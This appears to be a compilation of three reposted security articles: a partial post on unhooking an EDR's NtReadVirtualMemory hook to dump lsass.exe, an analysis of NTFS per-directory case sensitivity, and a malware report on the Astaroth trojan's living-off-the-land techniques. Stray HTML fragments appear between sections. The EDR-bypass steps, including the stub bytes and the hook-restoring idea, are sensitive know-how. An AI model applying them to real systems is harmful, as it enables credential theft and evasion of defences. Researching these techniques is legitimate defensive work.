However, after thinking “I got this!” and was ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason — the code while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe.

WHAT?!

Hold up, let me try just opening a handle to lsass.exe without any fancy stuff with just this line:

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid);

And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuzz about this. This is when I realized, I started off the approach the wrong way and the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny.

Back on Track

Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly.

Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called such as ReadProcessMemory (RPM) inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS.

Multiple calls to RPM

As you can see by, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1) and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand the Windows System Internal and how WINAPIs are processed. Using ReadProcessMemory as an example — it works like this.

ReadProcessMemory is just a wrapper. It does a bunch of sanity check such as nullptr check. That is all RPM does. However, RPM also calls a function “NtReadVirtualMemory”, which sets up the registers before doing a syscall instruction. Syscall instruction is just telling the CPU to enter kernel mode which then another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do.

— — — — — -Userland — — — —- — — — | — — — Kernel Land — — — —

RPM — > NtReadVirtualMemory —> SYSCALL->NtReadVirtualMemory

Kernel32 — — -ntdll — — — — — — — — — - — — — — — ntoskrnl

With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned.

However, readers should know that most if not all EDR products are using a service, specifically a driver running inside kernel mode. With access to the kernel mode, the driver could perform the hook at ANY of the level in the RPM’s callstack. However, this opens up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution is to put forward to prevent modification of such nature and that solution is known as Kernel Patch Protection (KPP or Patch Guard). KPP scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes ntoskrnl portion which houses the WINAPI’s kernel level’s logic. With this knowledge, we are assured that the EDR would not and did not hook any kernel level function inside that portion of the call stack, leaving us with the user-land’s RPM and NtReadVirtualMemory calls.

The Hook

To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below.

However, unlike RPM, NtReadVirtualMemory is not an exported function inside ntdll and therefore you cannot just reference to the function like normal. You must specify the signature of the function as well as linking ntdll.lib into your project to do so.

With everything in place, let’s run it and take a look!

Now, this provides us with the address of both RPM and ntReadVirtualMemory. I will now use my favorite reversing tool to read the memory and analyze its structure, Cheat Engine.

ReadProcessMemory
NtReadVirtualMemory

For the RPM function, it looks fine. It does some stack and register set up and then calls ReadProcessMemory inside Kernelbase (Topic for another time). Which would eventually leads you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook look like, you can tell that this is not normal. The first 5 bytes of the function is modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follows a very similar format:

0x4C, 0x8B, 0xD1, // mov r10, rcx; NtReadVirtualMemory

0xB8, 0x3c, 0x00, 0x00, 0x00, // eax, 3ch — aka syscall id

0x0F, 0x05, // syscall

0xC3 // retn

With one difference being the syscall id (which identifies the WINAPI function to be called once inside kernel land). However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let’s follow that.

CyMemDef64.dll

Okay, so we are no longer inside ntdll’s module but instead inside CyMemdef64.dll’s module. Ahhhhh now I get it.

The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirect the code flow into their own module which then checked for any sort of malicious activity. If the checks fail, the Nt* function would then return with an error code, never entering the kernel land and execute to begin with.

The Bypass

It is now very self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions.

Re-Patch the Patch

We know what the NtReadVirtualMemory function SHOULD looks like and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and enter the kernel where they have no control over.

Ntdll IAT Hook

We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we will recreate it elsewhere. Then, we will walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and points it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on their hook, it will looks unmodified. It just is never called and the ntdll IAT is pointed elsewhere.

The Result

I went with the first approach. It is simple, and it allows me to get out the blog quicker :). However, it would be trivial to do the second method and I have plans on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew who is currently battling a busted appendix in the hospital right now. Get well soon man.

AndrewSpecial.exe was never caught 😛

Conclusion

This currently works for this particular EDR, however — It would be trivial to reverse similar EDR products and create a universal bypass due to their limitation around what they can hook and what they can’t (Thank you KPP).

Did I also mention that this works on both 64 bit (on all versions of windows) and 32 bits (untested)? And the source code is available HERE.

Thank you again for your time and please let me know if I made any mistake.

NTFS Case Sensitivity on Windows

Original text by Tyranid’s Lair

Back in February 2018 Microsoft released on interesting blog post (link) which introduced per-directory case-sensitive NTFS support. MS have been working on making support for WSL more robust and interop between the Linux and Windows side of things started off a bit rocky. Of special concern was the different semantics between traditional Unix-like file systems and Windows NTFS.

I always keep an eye out for new Windows features which might have security implications and per-directory case sensitivity certainly caught my attention. With 1903 not too far off I thought it was time I actual did a short blog post about per-directory case-sensitivity and mull over some of the security implications. While I’m at it why not go on a whistle-stop tour of case sensitivity in Windows NT over the years.

Disclaimer. I don’t currently and have never previously worked for Microsoft so much of what I’m going to discuss is informed speculation.

The Early Years

The Windows NT operating system has had the ability to have case-sensitive files since the very first version. This is because of the OS’s well known, but little used, POSIX subsystem. If you look at the documentation for CreateFile you’ll notice a flag, FILE_FLAG_POSIX_SEMANTICS which is used for the following purposes:«Access will occur according to POSIX rules. This includes allowing multiple files with names, differing only in case, for file systems that support that naming.»
It’s make sense therefore that all you’d need to do to get a case-sensitive file system is use this flag exclusively. Of course being an optional flag it’s unlikely that the majority of Windows software will use it correctly. You might wonder what the flag is actually doing, as CreateFile is not a system call. If we dig into the code inside KERNEL32 we’ll find the following:
BOOL CreateFileInternal(LPCWSTR lpFileName,…, DWORD dwFlagsAndAttributes){ // … OBJECT_ATTRIBUTES ObjectAttributes;if(dwFlagsAndAttributes & FILE_FLAG_POSIX_SEMANTICS){ ObjectAttributes.Attributes = 0;}else{ ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;} NtCreateFile(…,&ObjectAttributes,…);}
This code shows that if the FILE_FLAG_POSIX_SEMANTICS flag is set, the the Attributes member of the OBJECT_ATTRIBUTES structure passed to NtCreateFile is initialized to 0. Otherwise it’s initialized with the flag OBJ_CASE_INSENSITIVE. The OBJ_CASE_INSENSITIVE instructs the Object Manager to do a case-insensitive lookup for a named kernel object. However files do not directly get parsed by the Object Manager, so the IO manager converts this flag to the IO_STACK_LOCATION flag SL_CASE_SENSITIVE before handing it off to the file system driver in an IRP_MJ_CREATE IRP. The file system driver can then honour that flag or not, in the case of NTFS it honours it and performs a case-sensitive file search instead of the default case-insensitive search.
Aside. Specifying FILE_FLAG_POSIX_SEMANTICS supports one other additional feature of CreateFile that I can see. By specifying FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_POSIX_SEMANTICS  and FILE_ATTRIBUTE_DIRECTORY in the dwFlagsAndAttributes parameter and CREATE_NEW as the dwCreationDisposition parameter the API will create a new directory and return a handle to it. This would normally require calling CreateDirectory, then a second call to open or using the native NtCreateFile system call.
NTFS always supported case-preserving operations, so creating the file AbC.txt will leave the case intact. However when it does an initial check to make sure the file doesn’t already exist if you request abc.TXT then NTFS would find it during a case-insensitive search. If the create is done case-sensitive then NTFS won’t find the file and you can now create the second file. This allows NTFS to support full case-sensitivity. 
It seems too simple to create files in a case-sensitive manner, just use the FILE_FLAG_POSIX_SEMANTICSflag or don’t pass OBJ_CASE_INSENSITIVE to NtCreateFile. Let’s try that using PowerShell on a default installation on Windows 10 1809 to see if that’s really the case.

Opening the file AbC.txt with OBJ_CASE_INSENSITIVE and without.

First we create a file with the name AbC.txt, as NTFS is case preserving this will be the name assigned to it in the file system. We then open the file first with the OBJ_CASE_INSENSITIVE attribute flag set and specifying the name all in lowercase. As expected we open the file and displaying the name shows the case-preserved form. Next we do the same operation without the OBJ_CASE_INSENSITIVE flag, however unexpectedly it still works. It seems the kernel is just ignoring the missing flag and doing the open case-insensitive. 
It turns out this is by design, as case-insensitive operation is defined as opt-in no one would ever correctly set the flag and the whole edifice of the Windows subsystem would probably quickly fall apart. Therefore honouring enabling support for case-sensitive operation is behind a Session Manager Kernel Registry valueObCaseInsensitive. This registry value is reflected in the global kernel variable, ObpCaseInsensitivewhich is set to TRUE by default. There’s only one place this variable is used, ObpLookupObjectName, which looks like the following:
NTSTATUS ObpLookupObjectName(POBJECT_ATTRIBUTES ObjectAttributes,…){ // … DWORD Attributes = ObjectAttributes->Attributes;if(ObpCaseInsensitive){ Attributes |= OBJ_CASE_INSENSITIVE;} // Continue lookup. }
From this code we can see if ObpCaseInsensitive set to TRUE then regardless of the Attribute flags passed to the lookup operation OBJ_CASE_INSENSITIVE is always set. What this means is no matter what you do you can’t perform a case-sensitive lookup operation on a default install of Windows. Of course if you installed the POSIX subsystem you’ll typically find the kernel variable set to FALSE which would enable case-sensitive operation for everyone, at least if they forget to set the flags. 
Let’s try the same test again with PowerShell but make sure ObpCaseInsensitive is FALSE to see if we now get the expected operation.

Running the same tests but with ObpCaseInsensitive set to FALSE. With OBJ_CASE_INSENSITIVE the file open succeeds, without the flag it fails with an error.

With the OBJ_CASE_INSENSITIVE flag set we can still open the file AbC.txt with the lower case name. However without specifying the flag we we get STATUS_OBJECT_NAME_NOT_FOUND which indicates the lookup operation failed.

Windows Subsystem for Linux

Let’s fast forward to the introduction of WSL in Windows 10 1607. WSL needed some way of representing a typical case-sensitive Linux file system. In theory the developers could have implemented it on top of a case-insensitive file system but that’d likely introduce too many compatibility issues. However just disabling ObCaseInsensitive globally would likely introduce their own set of compatibility issues on the Windows side. A compromise was needed to support case-sensitive files on an existing volume.
AsideIt could be argued that Unix-like operating systems (including Linux) don’t have a case-sensitive file system at all, but a case-blind file system. Most Unix-like file systems just treat file names on disk as strings of opaque bytes, either the file name matches a sequence of bytes or it doesn’t. The file system doesn’t really care whether any particular byte is a lower or upper case character. This of course leads to interesting problems such as where two file names which look identical to a user can have different byte representations resulting in unexpected failures to open files. Some file systems such macOS’s HFS+ use Unicode Normalization Forms to make file names have a canonical byte representation to make this easier but leads to massive additional complexity, and was infamously removed in the successor APFS.
This compromise can be found back in ObpLookupObjectName as shown below:
NTSTATUS ObpLookupObjectName(POBJECT_ATTRIBUTES ObjectAttributes,…){ // … DWORD Attributes = ObjectAttributes->Attributes;if(ObpCaseInsensitive && KeGetCurrentThread()->CrossThreadFlags.ExplicitCaseSensitivity == FALSE){ Attributes |= OBJ_CASE_INSENSITIVE;} // Continue lookup. }
In the code we now find that the existing check for ObpCaseInsensitive is augmented with an additional check on the current thread’s CrossThreadFlags for the ExplicitCaseSensitivity bit flag. Only if the flag is not set will case-insensitive lookup be forced. This looks like a quick hack to get case-sensitive files without having to change the global behavior. We can find the code which sets this flag in NtSetInformationThread.
NTSTATUS NtSetInformationThread(HANDLE ThreadHandle, THREADINFOCLASS ThreadInformationClass, PVOID ThreadInformation, ULONG ThreadInformationLength){switch(ThreadInformationClass){case ThreadExplicitCaseSensitivity:if(ThreadInformationLength !=sizeof(DWORD))return STATUS_INFO_LENGTH_MISMATCH; DWORD value =*((DWORD*)ThreadInformation);if(value){if(!SeSinglePrivilegeCheck(SeDebugPrivilege, PreviousMode))return STATUS_PRIVILEGE_NOT_HELD;if(!RtlTestProtectedAccess(Process, 0x51))return STATUS_ACCESS_DENIED;}if(value) Thread->CrossThreadFlags.ExplicitCaseSensitivity = TRUE;else Thread->CrossThreadFlags.ExplicitCaseSensitivity = FALSE;break;} // … }
Notice in the code to set the the ExplicitCaseSensitivity flag we need to have both SeDebugPrivilege and be a protected process at level 0x51 which is PPL at Windows signing level. This code is from Windows 10 1809, I’m not sure it was this restrictive previously. However for the purposes of WSL it doesn’t matter as all processes are gated by a system service and kernel driver so these checks can be easily bypassed. As any new thread for a WSL process must go via the Pico process driver this flag could be automatically set and everything would just work.

Per-Directory Case-Sensitivity

A per-thread opt-out from case-insensitivity solved the immediate problem, allowing WSL to create case-sensitive files on an existing volume, but it didn’t help Windows applications inter-operating with files created by WSL. I’m guessing NTFS makes no guarantees on what file will get opened if performing a case-insensitive lookup when there’s multiple files with the same name but with different case. A Windows application could easily get into difficultly trying to open a file and always getting the wrong one. Further work was clearly needed, so introduced in 1803 was the topic at the start of this blog, Per-Directory Case Sensitivity. 
The NTFS driver already handled the case-sensitive lookup operation, therefore why not move the responsibility to enable case sensitive operation to NTFS? There’s plenty of spare capacity for a simple bit flag. The blog post I reference at the start suggests using the fsutil command to set case-sensitivity, however of course I want to know how it’s done under the hood so I put fsutil from a Windows Insider build into IDA to find out what it was doing. Fortunately changing case-sensitivity is now documented. You pass the FILE_CASE_SENSITIVE_INFORMATION structure with the FILE_CS_FLAG_CASE_SENSITIVE_DIRset via NtSetInformationFile to a directory. with the FileCaseSensitiveInformation information class. We can see the implementation for this in the NTFS driver.
NTSTATUS NtfsSetCaseSensitiveInfo(PIRP Irp, PNTFS_FILE_OBJECT FileObject){if(FileObject->Type != FILE_DIRECTORY){return STATUS_INVALID_PARAMETER;} NSTATUS status = NtfsCaseSensitiveInfoAccessCheck(Irp, FileObject);if(NT_ERROR(status))return status; PFILE_CASE_SENSITIVE_INFORMATION info = (PFILE_CASE_SENSITIVE_INFORMATION)Irp->AssociatedIrp.SystemBuffer;if(info->Flags & FILE_CS_FLAG_CASE_SENSITIVE_DIR){if((g_NtfsEnableDirCaseSensitivity & 1)== 0)return STATUS_NOT_SUPPORTED;if((g_NtfsEnableDirCaseSensitivity & 2)&&!NtfsIsFileDeleteable(FileObject)){return STATUS_DIRECTORY_NOT_EMPTY;} FileObject->Flags |= 0x400;}else{if(NtfsDoesDirHaveCaseDifferingNames(FileObject)){return STATUS_CASE_DIFFERING_NAMES_IN_DIR;} FileObject->Flags &=~0x400;}return STATUS_SUCCESS;}
There’s a bit to unpack here. Firstly you can only apply this to a directory, which makes some sense based on the description of the feature. You also need to pass an access check with the call NtfsCaseSensitiveInfoAccessCheck. We’ll skip over that for a second. 
Next we go into the actual setting or unsetting of the flag. Support for Per-Directory Case-Sensitivity is not enabled unless bit 0 is set in the global g_NtfsEnableDirCaseSensitivity variable. This value is loaded from the value NtfsEnableDirCaseSensitivity in HKLM\SYSTEM\CurrentControlSet\Control\FileSystem, the value is set to 0 by default. This means that this feature is not available on a fresh install of Windows 10, almost certainly this value is set when WSL is installed, but I’ve also found it on the Microsoft app-development VMwhich I don’t believe has WSL installed, so you might find it enabled in unexpected places. The g_NtfsEnableDirCaseSensitivity variable can also have bit 1 set, which indicates that the directory must be empty before changing the case-sensitivity flag (checked with NtfsIsFileDeleteable) however I’ve not seen that enabled. If those checks pass then the flag 0x400 is set in the NTFS file object.
If the flag is being unset the only check made is whether the directory contains any existing colliding file names. This seems to have been added recently as when I originally tested this feature in an Insider Preview you could disable the flag with conflicting filenames which isn’t necessarily sensible behavior.
Going back to the access check, the code for NtfsCaseSensitiveInfoAccessCheck looks like the following:
NTSTATUS NtfsCaseSensitiveInfoAccessCheck(PIRP Irp, PNTFS_FILE_OBJECT FileObject){if(NtfsEffectiveMode(Irp)|| FileObject->Access & FILE_WRITE_ATTRIBUTES){ PSECURITY_DESCRIPTOR SecurityDescriptor; SECURITY_SUBJECT_CONTEXT SubjectContext; SeCaptureSubjectContext(&SubjectContext); NtfsLoadSecurityDescriptor(FileObject,&SecurityDescriptor);if(SeAccessCheck(SecurityDescriptor,&SubjectContext FILE_ADD_FILE | FILE_ADD_SUBDIRECTORY | FILE_DELETE_CHILD)){return STATUS_SUCCESS;}}return STATUS_ACCESS_DENIED;}
The first check ensures the file handle is opened with FILE_WRITE_ATTRIBUTES access, however that isn’t sufficient to enable the flag. The check also ensures that if an access check is performed on the directory’s security descriptor that the caller would be granted FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY and FILE_DELETE_CHILD access rights. Presumably this secondary check is to prevent situations where a file handle was shared to another process with less privileges but with FILE_WRITE_ATTRIBUTES rights. 
If the security check is passed and the feature is enabled you can now change the case-sensitivity behavior, and it’s even honored by arbitrary Windows applications such as PowerShell or notepad without any changes. Also note that the case-sensitivity flag is inherited by any new directory created under the original.

Showing setting case sensitive on a directory then using Set-Content and Get-Content to interact with the files.

Security Implications of Per-Directory Case-Sensitivity

Let’s get on to the thing which interests me most, what’s the security implications on this feature? You might not immediately see a problem with this behavior. What it does do is subvert the expectations of normal Windows applications when it comes to the behavior of file name lookup with no way of of detecting its use or mitigating against it. At least with the FILE_FLAG_POSIX_SEMANTICS flag you were only introducing unexpected case-sensitivity if you opted in, but this feature means the NTFS driver doesn’t pay any attention to the state of OBJ_CASE_INSENSITIVE when making its lookup decisions. That’s great from an interop perspective, but less great from a correctness perspective.
Some of the use cases I could see this being are problem are as follows:

  • TOCTOU where the file name used to open a file has its case modified between a security check and the final operation resulting in the check opening a different file to the final one. 
  • Overriding file lookup in a shared location if the create request’s case doesn’t the actual case of the file on disk. This would be mitigated if the flag to disable setting case-sensitivity on empty directories was enabled by default.
  • Directory tee’ing, where you replace lookup of an earlier directory in a path based on the state of the case-sensitive flag. This at least is partially mitigated by the check for conflicting file names in a directory, however I’ve no idea how robust that is.

I found it interesting that this feature also doesn’t use RtlIsSandboxToken to check the caller’s not in a sandbox. As long as you meet the access check requirements it looks like you can do this from an AppContainer, but its possible I missed something.  On the plus side this feature isn’t enabled by default, but I could imagine it getting set accidentally through enterprise imaging or some future application decides it must be on, such as Visual Studio. It’s a lot better from a security perspective to not turn on case-sensitivity globally. Also despite my initial interest I’ve yet to actual find a good use for this behavior, but IMO it’s only a matter of time 🙂

ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA

Original text by CYBEREASON NOCTURNUS RESEARCH

RESEARCH BY: ELI SALEM

In 2018, we saw a dramatic increase in cyber crimes in Brazil and, separately, the abuse of legitimate native Windows OS processes for malicious intent. Cyber attackers used living off the land binaries (LOLbins) to hide their malicious activity and operate stealthily in target systems. Using native, legitimate operating system tools, attackers were able to infiltrate and gain remote access to devices without any malware. For organizations with limited visibility into their environment, this type of attack can be fatal.


In this research, we explain one of the most recent and unique campaigns involving the Astaroth trojan.This Trojan and information stealer was recognized in Europe and chiefly affected Brazil through the abuse of native OS processes and the exploitation of security-related products.

Brazil is constantly being hit with cybercrime. To read about another pervasive attack in Brazil, check out our blog post. 

Pervasive Brazilian Financial Malware Targets Bank Customers in Latin America  and Europe  <https://www.cybereason.com/blog/brazilian-financial-malware-banking-europe-south-america>«/></a></figure>



<p><em><a href=Pervasive Brazilian Financial Malware Targets Bank Customers in Latin America and Europe

The Cybereason Platform was able to detect this new variant of the Astaroth Trojan in a massive spam campaign that targeted Brazil and parts of Europe. Our Active Hunting Service team was able to analyze the campaign and identify that it maliciously took advantage of legitimate tools like the BITSAdmin utilityand the WMIC utility to interact with a C2 server and download a payload. It was also able to use a component of multinational antivirus software Avast to gain information about the target system, as well as a process belonging to Brazilian information security company GAS Tecnologia to gather personal information. With a sophisticated attack such as this, it is critical for your security team to have a clear understanding of your environment so they can swiftly detect malicious activity and respond effectively. 

UNIQUE ASPECTS TO THIS LATEST VERSION OF THE ASTAROTH TROJAN CAMPAIGN

The Astaroth Trojan campaign is a phishing-based campaign that gained momentum towards the end of 2018 and was identified in thousands of incidents. Early versions differed significantly from later versions as the adversaries advanced and optimized their attack. This version contrasted significantly from previous versions in four key ways.

  1. This version maliciously used BITSAdmin to download the attackers payload. This differed from early versions of the campaign that used certutil.
  2. This version injects a malicious module into one of Avast’s processes, whereas early versions of the campaign detected Avast and quit. As Avast is the most common antivirus software in the world, this is an effective evasive strategy.
  3. This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected. This trusted process is prevalent on Brazilian machines. To the best of our knowledge, no other versions of the malware used this process.
  4. This version used a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and help hide the code it is initiating. Earlier versions did not use this method.

A BREAKDOWN OF THE LATEST ASTAROTH TROJAN SPAM CAMPAIGN

As with many traditional spam campaigns, this campaign begins with a .7zip file. This file gets downloaded to a user machine through a mail attachment or a mistakenly-pressed hyperlink.

The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware.

 

The .lnk file extracted from the .7zip file.

An obfuscated command is located inside the Target bar in the .lnk file properties. 

Hidden command inside the .lnk file.

The full obfuscated command inside the .lnk file.

When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw).

wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI). This utility is able to execute complicated WQL queries and WMI methods. It is often used by attackers for lateral movement, reconnaissance, and basic code invocation. By using a trusted, native utility, the attackers can hide the scope of the full attack and evade detection.

The initial attack vector as detected by the Cybereason Platform.

wmic.exe creates a .txt file with information about the domain that stores the remote XSL script. It identifies the location of the infected machine, including country, city, and other information. Once this information is gathered, it sends location data about the infected machine to the remote XSL script.

This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target. 

 The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment.

PHASE ONE: AN ANALYSIS OF THE REMOTE XSL

The remote XSL script that wmic.exe sends information to contains highly obfuscated JScript code that will execute additional steps of the malicious activity. The code is obfuscated in order to hide any malicious activity on the remote server.

Initially, the XSL script defines several variables for command execution and data storage. It also creates several ActiveX objects. The majority of ActiveX Objects created with Wscript.Shell and Shell.Applicationare used to run programs, create shortcuts, manipulate the contents of the registry, or access system folders. These variables are used to invoke legitimate Windows OS processes for malicious activities, and serve as a bridge between the remote domain that stores the script and the infected machine.  

Malicious script variables.

OBFUSCATION MECHANISM FOR THE JSCRIPT CODE

The malicious JScript code obfuscation relies on two main techniques.

  1. The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign.
  2. The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign. 

 String.fromCharCode() usage in the XSL script. 

The random number generator function radador().

 These two obfuscation techniques are used to bypass antivirus defenses and make security researcher investigations more challenging.

CHOOSING A C2 SERVER

The XSL script contains variable xparis() that holds the C2 domain the malicious files will be downloaded from. In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to. In order to decide which domain xparis() holds, a variable pingadori() uses the radador() function to randomize the domain. pingadori() is a random integer between one and twelve, which decides which domain xparis() is assigned.

The C2 domain selection mechanism.

One of the most used functions in the XSL script is Bxaki()Bxaki() takes a URL and a file as arguments. It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file.

In previous iterations, the Astaroth Trojan campaign used cerutil to download files. In order to hide this process, it was renamed certis. In this iteration, they have replaced certutil with BITSAdmin.

 Bxaki obfuscated function.

soulto

Bxaki deobfuscated function.

In order to gain access to the infected computer’s file system, the XSL script uses the variable fso with FileSystemObject capabilities. This variable is created using an ActiveX object. The XSL script contains additional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded files. 

The file’s path.  

The directory creation. 

DOWNLOADING THE PAYLOADS

The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files. These files are downloaded to a directory (C:\Users\Public\Libraries\tempsys) on the infected machine by Bxaki() and xparis(). Within these twelve files are the Astaroth Trojan modules, several additional files the Trojan may use to extend its capabilities, and an r1.log file. The r1.log file stores information for exfiltration. A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018. 

The script verifies all parts of the malware have been downloaded. 

After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded. 

One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth. 

The twelve downloaded files.

DETECTING AVAST 

A unique feature of this latest Astaroth Trojan campaign is the malware’s ability to search for specific security products and exploit them.

 In earlier variants, upon detecting Avast, the XSL script would simply quit. Instead, it now uses Avast to execute malicious actions. 

Similar to earlier versions of the Astaroth Trojan campaign, the XSL script searches for Avast on the infected machine, and specifically targets a certain process of Avast aswrundll.exe. It uses three variables stem1stem2, and stem3 that, when combined, form a specific path (C:\Program Files\AVAST Software\AVAST\aswRunDll.exe) to aswRundll.exe. It obfuscates this path using the fromCharCode()function.

aswrundll.exe is the Avast Software Runtime Dynamic Link Library that is responsible for running modules for Avast. If aswrundll.exe exists at this path, Avast exists on the machine.

Note: aswrundll.exe is very similar to Microsoft’s own rundll32.exe — it allows you to execute DLLs by calling their exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.

jsfile3

Stem variables presented as unicode strings.

Stem variables decoded to ASCII.

MANIPULATING AVAST

Once the XSL script has identified that Avast is installed on the machine, it loads a malicious module Irdsnhrxxxfery64 from its location on disk. In order to load this module, it uses an ActiveX Object ShAcreated with Shell.Application capabilities. The object uses ShellExecute() to create an aswrundll.exeprocess instance and loads Irdsnhrxxxfery64. It loads the module with parameter vShow set to zero, which opens the application with a hidden window. 

Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exeregsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry. 

 The script attempts to load the malicious module using regsvr with the run function. 

Procmon shows the malicious module loaded to the Avast process.

Procmon shows the malicious module loaded using the regsvr32.exe process.  

PHASE TWO: PAYLOAD ANALYSIS 

The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer.

 Information pertaining to lrdsnhxxfery64.~.

After unpacking the module, it is packed with an additional inner packer Pe123\RPolyCryptor. This module has to be investigated in a dynamic way to fully understand the malware and the role the module played during execution.

Information pertaining to lrdsnhrxxfery64_Unpacked.dll.

 Throughout the malware execution, Irdsnhrxxxfery64.~ acts as the main malware controller. The module initiates the malicious activity once the payload download is complete. It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language. 

 The main module collecting information about the machine.

CONTINUING MALICIOUS ACTIVITY AND MANIPULATING ADDITIONAL SECURITY PRODUCTS

After the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module Irdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW()function.

Similar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected into that process instead of regsvr32.exe

Irdsnhrxxxfery64 injecting lrdsnhrxxfery98.

The malicious modules in regsvr32.exe memory

After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded.

  1. If Irdsnhrxxxfery64 is loaded using aswrundll.exe, the module will continue to target aswrundll.exe.It will create new instances and continue to inject malicious content to it.
  2. If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes:
  • It will target unins000.exe if it is available. unins000.exe is a process developed by GAS Tecnologia that is common on Brazilian machines.
  • If unins000.exe does not exist, it will target Syswow64\userinit.exeuserinit.exe is a native Windows process that specifies the program that Winlogon runs when a user logs on to their computer.
  • Similarly, if unins000.exe and Syswow64\userinit.exe do not exist, it will target System32\userinit.exe.

The malware searches for targeted processes.

Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe

INJECTION TECHNIQUE TO INCREASE STEALTHINESS

After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source. This new process is in a suspended state so the malware can unmap its memory and write its contents to the new, allocated space. Once this is complete, it will resume the suspended process. By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process.

Astaroth module creates a process in a suspended state (dwCreationFlags set to 4).

Unmapping process memory.

Writing content and resuming the process.

The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~Irdsnhrxxxfery98.~, and module arqueiro

The downloaded modules found in regsvr32.exe as detected by the Cybereason platform.

DATA EXFILTRATION

The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate.

monitor98

Irdsnhrxxxfery98 information collecting capabilities.

In addition to its own information stealing capabilities, the Astaroth Trojan campaign also uses an external feature NetPass. NetPass is one of the downloaded payload files renamed to lrdsnhrxxferyb.jpg.

NetPass is a free network password recovery tool that, according to its developer Nirsoft, can recover passwords including:

  • Login passwords of remote computers on LAN.
  • Passwords of mail accounts on an exchange server stored by Microsoft Outlook.
